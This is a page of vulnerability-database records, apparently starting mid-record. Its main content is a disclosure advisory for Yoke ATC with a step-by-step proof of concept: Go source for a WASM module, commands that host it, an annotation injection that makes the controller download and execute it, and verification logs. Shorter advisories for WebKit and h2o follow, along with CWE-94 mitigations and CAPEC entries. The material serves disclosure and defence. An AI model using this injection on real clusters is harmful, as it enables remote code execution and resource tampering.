/tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\n# Clone yoke repository\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\n\n# Build yoke CLI (patch version if needed for compatibility)\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n\n# Verify installation\n/tmp/yoke version\n```\n\nExpected output:\n```\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\n\u2502 yoke \u2502 v0.18.0 \u2502\n\u2502 toolchain \u2502 go1.25.6 \u2502\n\u2502 k8s.io/client-go \u2502 v0.34.1 \u2502\n\u2502 github.com/tetratelabs/wazero \u2502 v1.6.0 \u2502\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\nExpected output:\n```\nCluster-access not granted: enable cluster-access to reuse existing TLS certificates.\nGenerating TLS certificates, this may take a second...\nFinished generating TLS certificates.\n---\nsuccessful takeoff of atc\n```\n\n**Step 4: Verify ATC deployment and permissions**\n```bash\nkubectl get pods -n atc\nkubectl get clusterrolebinding | grep atc\n```\n\nExpected output:\n```\nNAME READY STATUS RESTARTS AGE\natc-atc-6d4bcb7665-wvqkt 1/1 Running 0 22s\n\natc-atc-cluster-role-binding ClusterRole/cluster-admin 22s\n```\n\n**Step 5: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\nExpected output:\n```\nsuccessful takeoff of backendairway\n```\n\n### Exploitation Steps\n\n**Step 1: Create malicious WASM module**\n\nCreate `malicious-wasm.go`:\n```go\n// Malicious WASM module for VUL-001 vulnerability verification\npackage main\n\nimport (\n \"encoding/json\"\n \"fmt\"\n)\n\nfunc main() {\n // Create a ConfigMap to prove arbitrary code execution\n resource := map[string]interface{}{\n \"apiVersion\": \"v1\",\n \"kind\": \"ConfigMap\",\n \"metadata\": map[string]interface{}{\n \"name\": \"stolen-credentials\",\n \"namespace\": \"default\",\n \"labels\": map[string]string{\n \"vulnerability\": \"VUL-001\",\n \"type\": \"exfiltrated-token\",\n },\n },\n \"data\": map[string]string{\n \"vulnerability\": \"VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution\",\n \"proof\": \"This ConfigMap was created by malicious WASM code\",\n },\n }\n\n resources := []interface{}{resource}\n output, _ := json.Marshal(resources)\n fmt.Println(string(output))\n}\n```\n\nCompile to WASM:\n```bash\nGOOS=wasip1 GOARCH=wasm go build -o malicious.wasm ./malicious-wasm.go\n```\n\n**Step 2: Host malicious WASM**\n```bash\npython3 -m http.server 8888 \u0026\n```\n\n**Step 3: Get host IP accessible from Kind cluster**\n```bash\nHOST_IP=$(ip addr show docker0 | grep \u0027inet \u0027 | awk \u0027{print $2}\u0027 | cut -d/ -f1)\necho \"Malicious WASM URL: http://${HOST_IP}:8888/malicious.wasm\"\n```\n\n**Step 4: Create malicious Backend CR**\n```bash\nMALICIOUS_URL=\"http://${HOST_IP}:8888/malicious.wasm\"\n\nkubectl apply -f - \u003c\u003cEOF\napiVersion: examples.com/v1\nkind: Backend\nmetadata:\n name: malicious-backend\n namespace: default\n annotations:\n overrides.yoke.cd/flight: \"${MALICIOUS_URL}\"\nspec:\n image: nginx:latest\n replicas: 1\nEOF\n```\n\nExpected output:\n```\nbackend.examples.com/malicious-backend created\n```\n\n**Step 5: Verify exploitation**\n\nCheck ATC logs:\n```bash\nkubectl logs -n atc deployment/atc-atc | grep -i \"override\\|malicious\"\n```\n\nActual log output from verification:\n```json\n{\"time\":\"2026-02-01T13:58:30.4998068Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"375ms\",\"overrides\":{\"flight\":\"http://172.17.0.1:8888/malicious.wasm\"},\"validation\":{\"allowed\":true,\"status\":\"\"}}\n{\"time\":\"2026-02-01T13:56:33.826710613Z\",\"level\":\"WARN\",\"msg\":\"using override module\",\"component\":\"controller\",\"url\":\"http://172.17.0.1:8888/malicious.wasm\"}\n```\n\nCheck HTTP server logs (shows WASM download):\n```\n172.18.0.2 - - [01/Feb/2026 21:55:58] \"GET /malicious.wasm HTTP/1.1\" 200 -\n172.18.0.2 - - [01/Feb/2026 21:56:32] \"GET /malicious.wasm HTTP/1.1\" 200 -\n172.18.0.2 - - [01/Feb/2026 21:56:33] \"GET /malicious.wasm HTTP/1.1\" 200 -\n```\n\nCheck created ConfigMap:\n```bash\nkubectl get configmap stolen-credentials -n default -o yaml\n```\n\nActual output from verification:\n```yaml\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: stolen-credentials\n namespace: default\n labels:\n vulnerability: VUL-001\n type: exfiltrated-token\n app.kubernetes.io/managed-by: atc.yoke\n instance.atc.yoke.cd/name: malicious-backend-v2\ndata:\n vulnerability: \u0027VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution\u0027\n```\n\n### Expected Result\n\nThe malicious WASM module is downloaded and executed by the ATC controller, creating a ConfigMap named `stolen-credentials` in the cluster. This proves arbitrary code execution in the ATC controller context.\n\n## Impact\n\n**Vulnerability Type**: Remote Code Execution (RCE) / Code Injection\n\n**Attack Prerequisites**:\n- Attacker has permission to create/update Custom Resources managed by Yoke ATC\n- Network access to host malicious WASM (can be external URL)\n\n**Impact Assessment**:\n- **Confidentiality**: High - Attacker can create resources to exfiltrate data; if ClusterAccess is enabled, can read cluster secrets via host functions\n- **Integrity**: High - Attacker can create/modify arbitrary Kubernetes resources through WASM output\n- **Availability**: Medium - Attacker can disrupt cluster operations by creating malicious resources\n\n**Attack Scenario**:\n1. CI/CD developer or application developer with CR permissions creates a Backend CR with malicious annotation\n2. ATC controller downloads and executes attacker-controlled WASM\n3. Malicious WASM creates backdoor resources or exfiltrates sensitive data\n4. If ClusterAccess is enabled, attacker can read secrets and escalate to cluster-admin\n\n## Severity\n\n**CVSS v3.1 Score**: 8.8 (High)\n\n**Vector**: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n- Attack Vector (AV): Network - Malicious WASM can be hosted externally\n- Attack Complexity (AC): Low - Simple annotation injection\n- Privileges Required (PR): Low - Only CR create/update permission needed\n- User Interaction (UI): None - Automatic execution on CR creation\n- Scope (S): Unchanged - Impact within ATC controller context\n- Confidentiality (C): High - Can access controller context data\n- Integrity (I): High - Can create arbitrary resources\n- Availability (A): High - Can disrupt cluster operations\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that support the `overrides.yoke.cd/flight` annotation\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Disable annotation override feature**: Remove or disable the `overrides.yoke.cd/flight` annotation processing in production environments\n\n2. **Network policy**: Restrict ATC controller\u0027s outbound network access to prevent downloading external WASM modules\n\n3. **RBAC hardening**: Limit CR create/update permissions to trusted users only\n\n4. **Admission webhook**: Deploy a validating webhook to reject CRs with `overrides.yoke.cd/flight` annotations\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Yoke ATC Documentation: https://yokecd.github.io/docs/airtrafficcontroller/atc/\n- CWE-94: Improper Control of Generation of Code: https://cwe.mitre.org/data/definitions/94.html\n\n## Credits\n\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)",
"id": "GHSA-wj8p-jj64-h7ff",
"modified": "2026-02-13T17:15:43Z",
"published": "2026-02-12T22:06:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-wj8p-jj64-h7ff"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26056"
},
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC"
}
GHSA-WJ8W-XPFM-JPRQ
Vulnerability from github – Published: 2022-05-02 06:22 – Updated: 2022-05-02 06:22WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue."
{
"affected": [],
"aliases": [
"CVE-2010-1415"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-06-11T18:00:00Z",
"severity": "HIGH"
},
"details": "WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an \"API abuse issue.\"",
"id": "GHSA-wj8w-xpfm-jprq",
"modified": "2022-05-02T06:22:34Z",
"published": "2022-05-02T06:22:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1415"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7374"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2010//Jun/msg00002.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00003.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/40105"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/40196"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/41856"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/42314"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/43068"
},
{
"type": "WEB",
"url": "http://securitytracker.com/id?1024067"
},
{
"type": "WEB",
"url": "http://support.apple.com/kb/HT4196"
},
{
"type": "WEB",
"url": "http://support.apple.com/kb/HT4220"
},
{
"type": "WEB",
"url": "http://support.apple.com/kb/HT4225"
},
{
"type": "WEB",
"url": "http://support.apple.com/kb/HT4456"
},
{
"type": "WEB",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2011:039"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/40620"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-1006-1"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/1373"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/1512"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/2722"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0212"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2011/0552"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WJPV-64V2-2QPQ
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 19:13In h2oai/h2o-3 version 3.46.0.1, the run_tool command exposes classes in the water.tools package through the ast parser. This includes the XGBoostLibExtractTool class, which can be exploited to shut down the server and write large files to arbitrary directories, leading to a denial of service.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "h2o"
},
"ranges": [
{
"events": [
{
"introduced": "3.34.0.1"
},
{
"last_affected": "3.46.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "ai.h2o:h2o-ext-xgboost"
},
"ranges": [
{
"events": [
{
"introduced": "3.34.0.1"
},
{
"last_affected": "3.46.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-10572"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-20T19:13:16Z",
"nvd_published_at": "2025-03-20T10:15:17Z",
"severity": "HIGH"
},
"details": "In h2oai/h2o-3 version 3.46.0.1, the `run_tool` command exposes classes in the `water.tools` package through the `ast` parser. This includes the `XGBoostLibExtractTool` class, which can be exploited to shut down the server and write large files to arbitrary directories, leading to a denial of service.",
"id": "GHSA-wjpv-64v2-2qpq",
"modified": "2025-03-20T19:13:16Z",
"published": "2025-03-20T12:32:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10572"
},
{
"type": "PACKAGE",
"url": "https://github.com/h2oai/h2o-3"
},
{
"type": "WEB",
"url": "https://github.com/h2oai/h2o-3/blob/5e45e780f597961bda73adff765976db975f204b/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java#L12"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/db8939a0-9be8-4d0f-a8b0-1bd181666da2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "H2O Vulnerable to Denial of Service (DoS) and File Write"
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.